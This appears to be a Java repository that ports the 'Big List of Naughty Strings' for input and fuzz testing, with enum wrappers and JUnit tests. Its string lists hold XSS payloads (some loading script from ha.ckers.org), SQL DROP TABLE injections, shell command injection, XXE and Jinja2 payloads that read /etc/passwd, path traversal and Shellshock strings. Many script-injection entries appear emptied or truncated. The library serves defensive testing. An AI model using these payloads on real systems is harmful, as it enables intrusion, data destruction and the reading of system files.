"Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣", 229 | "̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰", 230 | "̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟", 231 | "̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕", 232 | "Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮" 233 | ); 234 | static List UNICODE_UPSIDE_DOWN = Arrays.asList( 235 | "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥", 236 | "00˙Ɩ$-" 237 | ); 238 | static List UNICODE_FONT = Arrays.asList( 239 | "The quick brown fox jumps over the lazy dog", 240 | "𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠", 241 | "𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌", 242 | "𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈", 243 | "𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰", 244 | "𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘", 245 | "𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐", 246 | "⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢" 247 | ); 248 | static List SCRIPT_INJECTION = Arrays.asList( 249 | "", 250 | "<script>alert('123');</script>", 251 | "", 252 | "", 253 | "\">", 254 | "'>", 255 | ">", 256 | "", 257 | "< / script >< script >alert(123)< / script >", 258 | " onfocus=JaVaSCript:alert(123) autofocus", 259 | "\" onfocus=JaVaSCript:alert(123) autofocus", 260 | "' onfocus=JaVaSCript:alert(123) autofocus", 261 | "<script>alert(123)</script>", 262 | "ript>alert(123)ript>", 263 | "-->", 264 | "\";alert(123);t=\"", 265 | "';alert(123);t='", 266 | "JavaSCript:alert(123)", 267 | ";alert(123);", 268 | "src=JaVaSCript:prompt(132)", 269 | "\"><\\x3Cscript>javascript:alert(1)", 282 | "'`\"><\\x00script>javascript:alert(1)", 283 | "ABC
DEF", 284 | "ABC
DEF", 285 | "ABC
DEF", 286 | "ABC
DEF", 287 | "ABC
DEF", 288 | "ABC
DEF", 289 | "ABC
DEF", 290 | "ABC
DEF", 291 | "ABC
DEF", 292 | "ABC
DEF", 293 | "ABC
DEF", 294 | "ABC
DEF", 295 | "ABC
DEF", 296 | "ABC
DEF", 297 | "ABC
DEF", 298 | "ABC
DEF", 299 | "ABC
DEF", 300 | "ABC
DEF", 301 | "ABC
DEF", 302 | "ABC
DEF", 303 | "ABC
DEF", 304 | "ABC
DEF", 305 | "ABC
DEF", 306 | "ABC
DEF", 307 | "ABC
DEF", 308 | "ABC
DEF", 309 | "ABC
DEF", 310 | "test", 311 | "test", 312 | "test", 313 | "test", 314 | "test", 315 | "test", 316 | "test", 317 | "test", 318 | "test", 319 | "test", 320 | "test", 321 | "test", 322 | "test", 323 | "test", 324 | "test", 325 | "test", 326 | "test", 327 | "test", 328 | "test", 329 | "test", 330 | "test", 331 | "test", 332 | "test", 333 | "test", 334 | "test", 335 | "test", 336 | "test", 337 | "test", 338 | "test", 339 | "test", 340 | "test", 341 | "test", 342 | "test", 343 | "test", 344 | "test", 345 | "test", 346 | "test", 347 | "test", 348 | "test", 349 | "test", 350 | "test", 351 | "test", 352 | "test", 353 | "test", 354 | "test", 355 | "test", 356 | "test", 357 | "test", 358 | "test", 359 | "test", 360 | "test", 361 | "test", 362 | "test", 363 | "test", 364 | "test", 365 | "test", 366 | "test", 367 | "`\"'>", 368 | "`\"'>", 369 | "`\"'>", 370 | "`\"'>", 371 | "`\"'>", 372 | "`\"'>", 373 | "`\"'>", 374 | "`\"'>", 375 | "`\"'>", 376 | "`\"'>", 377 | "\"`'>", 378 | "\"`'>", 379 | "\"`'>", 380 | "\"`'>", 381 | "\"`'>", 382 | "\"`'>", 383 | "\"`'>", 384 | "\"`'>", 385 | "\"`'>", 386 | "\"`'>", 387 | "\"`'>", 388 | "\"`'>", 389 | "\"`'>", 390 | "\"`'>", 391 | "\"`'>", 392 | "\"`'>", 393 | "\"`'>", 394 | "\"`'>", 395 | "\"`'>", 396 | "\"`'>", 397 | "\"`'>", 398 | "\"`'>", 399 | "\"`'>", 400 | "\"`'>", 401 | "\"`'>", 402 | "\"`'>", 403 | "\"`'>", 404 | "\"`'>", 405 | "\"`'>", 406 | "\"`'>", 407 | "\"`'>", 408 | "\"`'>", 409 | "\"`'>", 410 | "\"`'>", 411 | "\"`'>", 412 | "\"`'>", 413 | "\"`'>", 414 | "", 415 | "", 416 | "", 417 | "", 418 | "", 419 | "", 420 | "", 421 | "", 422 | "", 423 | "", 424 | "", 425 | "", 426 | "", 427 | "", 428 | "", 429 | "", 430 | "", 431 | "", 432 | "", 433 | "", 434 | "", 435 | "", 436 | "", 437 | "", 438 | "", 439 | "", 440 | "", 441 | "", 442 | "", 443 | "", 444 | "", 445 | "", 446 | "", 447 | "", 448 | "XXX", 449 | "javascript:alert(1)\"` `>", 450 | "", 451 | "", 452 | "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", 453 | "<!--[if]><script>javascript:alert(1)</script -->", 454 | "<!--[if<img src=x onerror=javascript:alert(1)//]> -->", 455 | "<script src=\"/\\%(jscript)s\"></script>", 456 | "<script src=\"\\\\%(jscript)s\"></script>", 457 | "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", 458 | "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", 459 | "<IMG SRC=# onmouseover=\"alert('xxs')\">", 460 | "<IMG SRC= onmouseover=\"alert('xxs')\">", 461 | "<IMG onmouseover=\"alert('xxs')\">", 462 | "<IMG SRC=javascript:alert('XSS')>", 463 | "<IMG SRC=javascript:alert('XSS')>", 464 | "<IMG SRC=javascript:alert('XSS')>", 465 | "<IMG SRC=\"jav ascript:alert('XSS');\">", 466 | "<IMG SRC=\"jav ascript:alert('XSS');\">", 467 | "<IMG SRC=\"jav ascript:alert('XSS');\">", 468 | "<IMG SRC=\"jav ascript:alert('XSS');\">", 469 | "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out", 470 | "<IMG SRC=\"  javascript:alert('XSS');\">", 471 | "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", 472 | "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", 473 | "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", 474 | "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", 475 | "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", 476 | "<SCRIPT SRC=//ha.ckers.org/.j>", 477 | "<IMG SRC=\"javascript:alert('XSS')\"", 478 | "<iframe src=http://ha.ckers.org/scriptlet.html <", 479 | "\\\";alert('XSS');//", 480 | "<u oncopy=alert()> Copy me</u>", 481 | "<i onwheel=alert(1)> Scroll over me </i>", 482 | "<plaintext>", 483 | "http://a/%%30%30", 484 | "</textarea><script>alert(123)</script>" 485 | ); 486 | static List<String> SQL_INJECTION = Arrays.asList( 487 | "1;DROP TABLE users", 488 | "1'; DROP TABLE users-- 1", 489 | "' OR 1=1 -- 1", 490 | "' OR '1'='1", 491 | "'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --", 492 | " ", 493 | "%", 494 | "_" 495 | ); 496 | static List<String> SERVER_CODE_INJECTION = Arrays.asList( 497 | "-", 498 | "--", 499 | "--version", 500 | "--help", 501 | "$USER", 502 | "/dev/null; touch /tmp/blns.fail ; echo", 503 | "`touch /tmp/blns.fail`", 504 | "$(touch /tmp/blns.fail)", 505 | "@{[system \"touch /tmp/blns.fail\"]}" 506 | ); 507 | static List<String> COMMAND_INJECTION = Arrays.asList( 508 | "eval(\"puts 'hello world'\")", 509 | "System(\"ls -al /\")", 510 | "`ls -al /`", 511 | "Kernel.exec(\"ls -al /\")", 512 | "Kernel.exit(1)", 513 | "%x('ls -al /')" 514 | ); 515 | static List<String> XXE_INJECTION = Arrays.asList( 516 | "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>" 517 | ); 518 | static List<String> UNWANTED_INTERPOLATION = Arrays.asList( 519 | "$HOME", 520 | "$ENV{'HOME'}", 521 | "%d", 522 | "%s%s%s%s%s", 523 | "{0}", 524 | "%*.*s", 525 | "%@", 526 | "%n", 527 | "File:///" 528 | ); 529 | static List<String> FILE_INCLUSION = Arrays.asList( 530 | "../../../../../../../../../../../etc/passwd%00", 531 | "../../../../../../../../../../../etc/hosts" 532 | ); 533 | static List<String> CVES_AND_VULNERABILITIES = Arrays.asList( 534 | "() { 0; }; touch /tmp/blns.shellshock1.fail;", 535 | "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", 536 | "<<< %s(un='%s') = %u", 537 | "+++ATH0" 538 | ); 539 | static List<String> WINDOWS_SPECIAL_FILENAMES = Arrays.asList( 540 | "CON", 541 | "PRN", 542 | "AUX", 543 | "CLOCK$", 544 | "NUL", 545 | "A:", 546 | "ZZ:", 547 | "COM1", 548 | "LPT1", 549 | "LPT2", 550 | "LPT3", 551 | "COM2", 552 | "COM3", 553 | "COM4" 554 | ); 555 | static List<String> IRC_SPECIFIC_STRINGS = Arrays.asList( 556 | "DCC SEND STARTKEYLOGGER 0 0 0" 557 | ); 558 | static List<String> SCUNTHORPE_PROBLEM = Arrays.asList( 559 | "Scunthorpe General Hospital", 560 | "Penistone Community Church", 561 | "Lightwater Country Park", 562 | "Jimmy Clitheroe", 563 | "Horniman Museum", 564 | "shitake mushrooms", 565 | "RomansInSussex.co.uk", 566 | "http://www.cum.qc.ca/", 567 | "Craig Cockburn, Software Specialist", 568 | "Linda Callahan", 569 | "Dr. Herman I. Libshitz", 570 | "magna cum laude", 571 | "Super Bowl XXX", 572 | "medieval erection of parapets", 573 | "evaluate", 574 | "mocha", 575 | "expression", 576 | "Arsenal canal", 577 | "classic", 578 | "Tyson Gay", 579 | "Dick Van Dyke", 580 | "basement" 581 | ); 582 | static List<String> HUMAN_INJECTION = Arrays.asList( 583 | "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you." 584 | ); 585 | static List<String> TERMINAL_ESCAPE_CODES = Arrays.asList( 586 | "Roses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue", 587 | "But now...\u001b[20Cfor my greatest trick...\u001b[8m", 588 | "The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]" 589 | ); 590 | static List<String> IOS_VULNERABILITIES = Arrays.asList( 591 | "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗", 592 | "🏳0🌈️", 593 | "జ్ఞ‌ా" 594 | ); 595 | static List<String> PERSIAN_SPECIAL_CHARACTERS = Arrays.asList( 596 | "گچپژ" 597 | ); 598 | static List<String> JINJA_2_INJECTION = Arrays.asList( 599 | "{% print 'x' * 64 * 1024**3 %}", 600 | "{{ \"\".__class__.__mro__[2].__subclasses__()[40](\"/etc/passwd\").read() }}" 601 | ); 602 | 603 | static List<String> ALL = getAllStringList(); 604 | 605 | static List<String> getRandomStrings(int size, NaughtyStrings type) { 606 | if (size < 0) 607 | throw new IllegalArgumentException("Size cannot be negative"); 608 | 609 | if (type == null) 610 | throw new IllegalArgumentException("Invalid Naughty Strings Type"); 611 | 612 | return new Random().ints(0, type.getString().size()) 613 | .mapToObj(index -> type.getString().get(index)) 614 | .limit(size) 615 | .collect(Collectors.toList()); 616 | } 617 | 618 | static List<String> getStrings(NaughtyStrings type) { 619 | if (type == null) 620 | throw new IllegalArgumentException("Invalid Naughty Strings Type"); 621 | return type.getString(); 622 | } 623 | 624 | @SuppressWarnings("unchecked") 625 | public static <T> List<T> join(List<T>... lists) { 626 | List<T> result = new ArrayList<T>(); 627 | for (List<T> list : lists) { 628 | result.addAll(list); 629 | } 630 | return result; 631 | } 632 | 633 | public static List<String> getAllStringList() { 634 | return join(RESERVED_STRINGS, NUMERIC_STRINGS, SPECIAL_CHARACTERS, 635 | UNICODE_SYMBOLS, UNICODE_SUBSCRIPT_SUPERSCRIPT_ACCENTS, QUOTATION_MARKS, TWO_BYTE_CHARACTERS, TWO_BYTE_LETTER, SPECIAL_UNICODE_CHARACTERS_UNION, 636 | CHANGING_LENGTH_WHEN_LOWERCASE, JAPANESE_EMOTICONS, EMOJI, REGIONAL_INDICATOR_SYMBOLS, UNICODE_NUMBERS, RIGHT_TO_LEFT_STRINGS, OGHAM_TEXT, 637 | UNICODE_UPSIDE_DOWN, UNICODE_FONT, SCRIPT_INJECTION, SQL_INJECTION, SERVER_CODE_INJECTION, COMMAND_INJECTION, XXE_INJECTION, UNWANTED_INTERPOLATION, 638 | FILE_INCLUSION, CVES_AND_VULNERABILITIES, WINDOWS_SPECIAL_FILENAMES, IRC_SPECIFIC_STRINGS, SCUNTHORPE_PROBLEM, HUMAN_INJECTION, TERMINAL_ESCAPE_CODES, 639 | IOS_VULNERABILITIES, PERSIAN_SPECIAL_CHARACTERS, JINJA_2_INJECTION); 640 | } 641 | } 642 | -------------------------------------------------------------------------------- /src/main/java/io/github/nowshad/NaughtyStrings.java: -------------------------------------------------------------------------------- 1 | package io.github.nowshad; 2 | 3 | import java.util.List; 4 | 5 | public enum NaughtyStrings { 6 | RESERVED_STRINGS(BLNSInternal.RESERVED_STRINGS), 7 | NUMERIC_STRINGS(BLNSInternal.NUMERIC_STRINGS), 8 | SPECIAL_CHARACTERS(BLNSInternal.SPECIAL_CHARACTERS), 9 | UNICODE_SYMBOLS(BLNSInternal.UNICODE_SYMBOLS), 10 | UNICODE_SUBSCRIPT_SUPERSCRIPT_ACCENTS(BLNSInternal.UNICODE_SUBSCRIPT_SUPERSCRIPT_ACCENTS), 11 | QUOTATION_MARKS(BLNSInternal.QUOTATION_MARKS), 12 | TWO_BYTE_CHARACTERS(BLNSInternal.TWO_BYTE_CHARACTERS), 13 | TWO_BYTE_LETTER(BLNSInternal.TWO_BYTE_LETTER), 14 | SPECIAL_UNICODE_CHARACTERS_UNION(BLNSInternal.SPECIAL_UNICODE_CHARACTERS_UNION), 15 | CHANGING_LENGTH_WHEN_LOWERCASE(BLNSInternal.CHANGING_LENGTH_WHEN_LOWERCASE), 16 | JAPANESE_EMOTICONS(BLNSInternal.JAPANESE_EMOTICONS), 17 | EMOJI(BLNSInternal.EMOJI), 18 | REGIONAL_INDICATOR_SYMBOLS(BLNSInternal.REGIONAL_INDICATOR_SYMBOLS), 19 | UNICODE_NUMBERS(BLNSInternal.UNICODE_NUMBERS), 20 | RIGHT_TO_LEFT_STRINGS(BLNSInternal.RIGHT_TO_LEFT_STRINGS), 21 | OGHAM_TEXT(BLNSInternal.OGHAM_TEXT), 22 | UNICODE_UPSIDE_DOWN(BLNSInternal.UNICODE_UPSIDE_DOWN), 23 | UNICODE_FONT(BLNSInternal.UNICODE_FONT), 24 | SCRIPT_INJECTION(BLNSInternal.SCRIPT_INJECTION), 25 | SQL_INJECTION(BLNSInternal.SQL_INJECTION), 26 | SERVER_CODE_INJECTION(BLNSInternal.SERVER_CODE_INJECTION), 27 | COMMAND_INJECTION(BLNSInternal.COMMAND_INJECTION), 28 | XXE_INJECTION(BLNSInternal.XXE_INJECTION), 29 | UNWANTED_INTERPOLATION(BLNSInternal.UNWANTED_INTERPOLATION), 30 | FILE_INCLUSION(BLNSInternal.FILE_INCLUSION), 31 | CVES_AND_VULNERABILITIES(BLNSInternal.CVES_AND_VULNERABILITIES), 32 | WINDOWS_SPECIAL_FILENAMES(BLNSInternal.WINDOWS_SPECIAL_FILENAMES), 33 | IRC_SPECIFIC_STRINGS(BLNSInternal.IRC_SPECIFIC_STRINGS), 34 | SCUNTHORPE_PROBLEM(BLNSInternal.SCUNTHORPE_PROBLEM), 35 | HUMAN_INJECTION(BLNSInternal.HUMAN_INJECTION), 36 | TERMINAL_ESCAPE_CODES(BLNSInternal.TERMINAL_ESCAPE_CODES), 37 | IOS_VULNERABILITIES(BLNSInternal.IOS_VULNERABILITIES), 38 | PERSIAN_SPECIAL_CHARACTERS(BLNSInternal.PERSIAN_SPECIAL_CHARACTERS), 39 | JINJA_2_INJECTION(BLNSInternal.JINJA_2_INJECTION), 40 | ALL(BLNSInternal.ALL); 41 | 42 | private List<String> items; 43 | 44 | NaughtyStrings(List<String> items) { 45 | this.items = items; 46 | } 47 | 48 | public List<String> getString() { 49 | return items; 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /src/test/java/io/github/nowshad/BLNSInternalTest.java: -------------------------------------------------------------------------------- 1 | package io.github.nowshad; 2 | 3 | import org.junit.jupiter.api.Test; 4 | 5 | import java.util.List; 6 | 7 | import static org.junit.jupiter.api.Assertions.*; 8 | 9 | class BLNSInternalTest { 10 | 11 | @Test 12 | void testGetRandomStrings_whenEmptyList_shouldReturnEmptyList() { 13 | List<String> results = BLNSInternal.getRandomStrings(0, NaughtyStrings.ALL); 14 | assertTrue(results.isEmpty()); 15 | } 16 | 17 | @Test 18 | void testGetRandomStrings_whenSingleItemList_shouldReturnSingleItemList() { 19 | List<String> result = BLNSInternal.getRandomStrings(1, NaughtyStrings.ALL); 20 | assertFalse(result.isEmpty()); 21 | assertEquals(1, result.size()); 22 | } 23 | 24 | @Test 25 | void testGetRandomStrings_whenNegativeSize_shouldThrowError() { 26 | assertThrows(IllegalArgumentException.class, () -> BLNSInternal.getRandomStrings(-1, NaughtyStrings.ALL)); 27 | } 28 | 29 | @Test 30 | void testGetStrings_whenReservedType_shouldReturnReservedItems() { 31 | List<String> actualList = BLNSInternal.getStrings(NaughtyStrings.RESERVED_STRINGS); 32 | List<String> expectedList = NaughtyStrings.RESERVED_STRINGS.getString(); 33 | assertIterableEquals(expectedList, actualList); 34 | } 35 | 36 | @Test 37 | void testGetStrings_whenReservedType_shouldReturnListOfStrings() { 38 | List<String> reservedList = BLNSInternal.getStrings(NaughtyStrings.RESERVED_STRINGS); 39 | assertTrue(reservedList.size() > 0); 40 | } 41 | 42 | @Test 43 | void testGetStrings_whenAllStringType_shouldReturnAllStrings() { 44 | List<String> allStrings = BLNSInternal.getAllStringList(); 45 | assertIterableEquals(allStrings, BLNSInternal.getStrings(NaughtyStrings.ALL)); 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /src/test/java/io/github/nowshad/BLNSTest.java: -------------------------------------------------------------------------------- 1 | package io.github.nowshad; 2 | 3 | import org.junit.jupiter.api.Test; 4 | 5 | import java.util.List; 6 | 7 | import static org.junit.jupiter.api.Assertions.*; 8 | 9 | /** 10 | * @author Nowshad Hasan 11 | * @since 30/7/22 7:52 am 12 | */ 13 | public class BLNSTest { 14 | 15 | @Test 16 | void testGetRandomList_whenSizeGreaterThanZero_shouldReturnGreaterThanZeroList() { 17 | List<String> randomList = BLNS.getRandomList(10, NaughtyStrings.CHANGING_LENGTH_WHEN_LOWERCASE); 18 | assertTrue(randomList.size() > 0); 19 | } 20 | 21 | @Test 22 | void testGetRandomList_whenSizeLessThanZero_shouldThrowError() { 23 | assertThrows(IllegalArgumentException.class, () -> BLNS.getRandomList(-20, NaughtyStrings.REGIONAL_INDICATOR_SYMBOLS)); 24 | } 25 | 26 | @Test 27 | void testGetRandomList_whenTypeIsNull_shouldThrowError() { 28 | assertThrows(IllegalArgumentException.class, () -> BLNS.getRandomList(20, null)); 29 | } 30 | 31 | @Test 32 | void testGetList_whenNull_shouldThrowError() { 33 | assertThrows(IllegalArgumentException.class, () -> BLNS.getList(null)); 34 | } 35 | 36 | @Test 37 | void testGetList_whenAllString_shouldReturnAllStrings() { 38 | List<String> actualList = BLNSInternal.getAllStringList(); 39 | List<String> expectedList = BLNS.getList(NaughtyStrings.ALL); 40 | assertIterableEquals(actualList, expectedList); 41 | } 42 | 43 | @Test 44 | void testGetList_whenReservedString_shouldReturnReservedStrings() { 45 | List<String> actualList = BLNSInternal.getStrings(NaughtyStrings.RESERVED_STRINGS); 46 | List<String> expectedList = BLNS.getList(NaughtyStrings.RESERVED_STRINGS); 47 | assertIterableEquals(actualList, expectedList); 48 | } 49 | 50 | @Test 51 | void testGetList_whenRegionalIndicatorSymbols_shouldReturnRegionalIndicatorSymbols() { 52 | List<String> actualList = BLNSInternal.getStrings(NaughtyStrings.REGIONAL_INDICATOR_SYMBOLS); 53 | List<String> expectedList = BLNS.getList(NaughtyStrings.REGIONAL_INDICATOR_SYMBOLS); 54 | assertIterableEquals(actualList, expectedList); 55 | } 56 | 57 | @Test 58 | void testGetList_whenJapaneseEmoticons_shouldReturnJapaneseEmoticons() { 59 | List<String> actualList = BLNSInternal.getStrings(NaughtyStrings.JAPANESE_EMOTICONS); 60 | List<String> expectedList = BLNS.getList(NaughtyStrings.JAPANESE_EMOTICONS); 61 | assertIterableEquals(actualList, expectedList); 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /src/test/java/io/github/nowshad/NaughtyStringsTest.java: -------------------------------------------------------------------------------- 1 | package io.github.nowshad; 2 | 3 | import org.junit.jupiter.api.Test; 4 | 5 | import java.util.List; 6 | 7 | import static org.junit.jupiter.api.Assertions.assertIterableEquals; 8 | import static org.junit.jupiter.api.Assertions.assertTrue; 9 | 10 | /** 11 | * @author Nowshad Hasan 12 | * @since 29/7/22 2:04 pm 13 | */ 14 | public class NaughtyStringsTest { 15 | 16 | @Test 17 | void testNumericString_whenNumericString_shouldReturnNumericStringList() { 18 | List<String> expectedList = NaughtyStrings.NUMERIC_STRINGS.getString(); 19 | List<String> actualList = BLNSInternal.NUMERIC_STRINGS; 20 | assertIterableEquals(expectedList, actualList); 21 | } 22 | 23 | @Test 24 | void testSpecialCharacters_whenSpecialCharacters_shouldReturnGreaterThanZeroList() { 25 | List<String> expectedList = NaughtyStrings.SPECIAL_CHARACTERS.getString(); 26 | assertTrue(expectedList.size() > 0); 27 | } 28 | } 29 | --------------------------------------------------------------------------------